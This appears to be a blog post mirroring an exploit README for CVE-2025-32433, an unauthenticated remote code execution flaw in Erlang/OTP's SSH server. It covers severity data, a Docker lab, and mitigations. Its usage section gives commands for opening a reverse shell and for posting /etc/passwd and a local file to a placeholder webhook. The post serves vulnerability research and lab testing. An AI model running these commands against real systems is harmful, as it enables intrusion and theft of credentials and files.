{"id":751,"date":"2025-04-20T10:35:44","date_gmt":"2025-04-20T10:35:44","guid":{"rendered":"http:\/\/localhost\/?p=751"},"modified":"2025-04-20T10:35:44","modified_gmt":"2025-04-20T10:35:44","slug":"exploit-for-cve-2025-32433","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=751","title":{"rendered":"Exploit for CVE-2025-32433"},"content":{"rendered":"
\n

Vulnerability Details<\/h2>\n
\n

Basic Information<\/h3>\n\n\n\n\n\n\n
Title<\/th>\nExploit for CVE-2025-32433<\/td>\n<\/tr>\n
Type<\/th>\ngithubexploit<\/td>\n<\/tr>\n
Published<\/th>\n2025-04-19T21:37:47<\/td>\n<\/tr>\n
Last Seen<\/th>\n2025-04-20T15:04:23<\/td>\n<\/tr>\n
CVSS Score<\/th>\n10.0 (CRITICAL)<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

CVSS v3 Details<\/h3>\n\n\n\n\n\n\n\n\n\n
Attack Vector<\/th>\nNETWORK<\/td>\n<\/tr>\n
Attack Complexity<\/th>\nLOW<\/td>\n<\/tr>\n
Privileges Required<\/th>\nNONE<\/td>\n<\/tr>\n
User Interaction<\/th>\nNONE<\/td>\n<\/tr>\n
Scope<\/th>\nCHANGED<\/td>\n<\/tr>\n
Confidentiality Impact<\/th>\nHIGH<\/td>\n<\/tr>\n
Integrity Impact<\/th>\nHIGH<\/td>\n<\/tr>\n
Availability Impact<\/th>\nHIGH<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

CVE Information<\/h3>\n\n\n\n\n
CVE IDs<\/th>\nCVE-2025-32433<\/td>\n<\/tr>\n
CWE<\/th>\n<\/td>\n<\/tr>\n
Bulletin Family<\/th>\nexploit<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

Description<\/h3>\n
\n # CVE-2025-32433 – Critical Erlang\/OTP SSH Vulnerability<\/p>\n

![SSH ERLANG EXPLOIT](image.png)<\/p>\n

## Overview \ud83d\udd0d<\/p>\n

CVE-2025-32433 is a critical vulnerability discovered in Erlang\/OTP’s SSH implementation that allows **unauthenticated remote code execution** via specially crafted SSH messages. This severe security flaw enables attackers to execute arbitrary code on affected systems without authentication.<\/p>\n

* **What**: Remote Code Execution (RCE) via unauthenticated SSH messages in Erlang\/OTP
\n* **Impact**: Full code execution, potentially as root, over the network
\n* **Affected**: Any system running an Erlang\/OTP-based SSH server
\n* **Fix**: Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`
\n* **Workaround**: Restrict SSH access using firewall rules<\/p>\n

## Vulnerability Details \u26a0\ufe0f<\/p>\n

Discovered by researchers at Ruhr University Bochum, this vulnerability stems from improper handling of SSH connection protocol messages in Erlang\/OTP. It allows attackers to send maliciously crafted messages before authentication is completed, resulting in unauthenticated arbitrary code execution.<\/p>\n

If the Erlang SSH daemon is running as root (a common configuration), successful exploitation grants full system control, making it a prime candidate for ransomware deployment, lateral movement through networks, or data exfiltration.<\/p>\n

## Affected Versions \ud83d\udc1b<\/p>\n

* <= OTP-27.3.2\n* <= OTP-26.2.5.10\n* <= OTP-25.3.2.19\n\n## Lab Setup \ud83d\udda5\ufe0f\n\nFollow these steps to set up a test environment:\n\n1. **Install Docker and Docker Compose**\n ```bash\n sudo apt update\n sudo apt install apt-transport-https ca-certificates curl gnupg lsb-release\n curl -fsSL https:\/\/download.docker.com\/linux\/ubuntu\/gpg | sudo apt-key add -\n sudo add-apt-repository \"deb [arch=amd64] https:\/\/download.docker.com\/linux\/ubuntu $(lsb_release -cs) stable\"\n sudo apt install docker-ce docker-ce-cli containerd.io\n sudo docker --version\n sudo curl -L \"https:\/\/github.com\/docker\/compose\/releases\/download\/v2.29.1\/docker-compose-$(uname -s)-$(uname -m)\" -o \/usr\/local\/bin\/docker-compose\n sudo chmod +x \/usr\/local\/bin\/docker-compose\n docker-compose --version\n ```\n\n2. **Build and Run the Vulnerable Container**\n ```bash\n docker build -t erlang-ssh .\n docker run -d --name erlang-ssh-container -p 2222:2222 -v \/home\/local.txt:\/home erlang-ssh\n ```\n3. **Set Up as a Service**\n\n To run the container as a service that starts automatically:\n \n a. Create a systemd service file:\n ```bash\n sudo nano \/etc\/systemd\/system\/erlang-ssh-vuln.service\n ```\n b. Add the following content:\n ```bash\n [Unit]\n Description=Erlang SSH Vulnerability Lab\n After=docker.service\n Requires=docker.service\n \n [Service]\n TimeoutStartSec=0\n Restart=always\n ExecStartPre=-\/usr\/bin\/docker stop erlang-ssh-container\n ExecStartPre=-\/usr\/bin\/docker rm erlang-ssh-container\n ExecStart=\/usr\/bin\/docker run --name erlang-ssh-container -p 2222:2222 -v \/home\/local.txt:\/home erlang-ssh\n ExecStop=\/usr\/bin\/docker stop erlang-ssh-container\n \n [Install]\n WantedBy=multi-user.target\n ```\n \n c. Enable and start the service:\n ```bash\n sudo systemctl daemon-reload\n sudo systemctl enable erlang-ssh-vuln.service\n sudo systemctl start erlang-ssh-vuln.service\n ```\n\n\n## Exploit Usage \ud83d\ude80\n\nThe exploit script provides several options for testing and exploiting the vulnerability:\n\n### Basic Syntax:\n```bash\npython exploit.py [options]
\n“`<\/p>\n

### Check Vulnerability:
\n“`bash
\npython exploit.py 172.32.33.28 -p 2222 –check
\n“`<\/p>\n

### Execute Command:
\n“`bash
\npython exploit.py 172.32.33.28 -p 2222 -c ‘ls -la’
\n“`<\/p>\n

### Get Reverse Shell:
\n“`bash
\npython exploit.py 172.32.33.28 -p 2222 –shell –lhost 172.32.36.48 –lport 4444
\n“`<\/p>\n

### Alternative Data Exfiltration:
\nIf direct commands don’t work, you can use webhook-based exfiltration:
\n“`bash
\npython exploit.py 172.32.33.28 -p 2222 -c “curl -X POST -d @\/etc\/passwd WEBHOOKURL”
\n“`
\n“`bash
\npython exploit.py 172.32.33.28 -p 2222 -c “curl -X POST -d @\/home\/local.txt WEBHOOKURL”
\n“`<\/p>\n

## Mitigation Steps \ud83d\udee1\ufe0f<\/p>\n

1. **Update Erlang\/OTP**:
\n – Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`
\n – These patched versions properly validate SSH protocol messages<\/p>\n

2. **Network Controls**:
\n – Restrict access to SSH services with firewall rules
\n – Implement network segmentation to isolate critical systems<\/p>\n

3. **Monitoring**:
\n – Deploy intrusion detection\/prevention systems to monitor for exploitation attempts
\n – Enable enhanced logging for SSH connections<\/p><\/div>\n<\/p><\/div>\n

\n

Impact Assessment<\/h3>\n\n\n\n
Base Score<\/th>\n10.0<\/td>\n<\/tr>\n
Severity<\/th>\nCRITICAL<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

View full CVE details<\/a><\/p>\n<\/p><\/div>\n<\/div>\n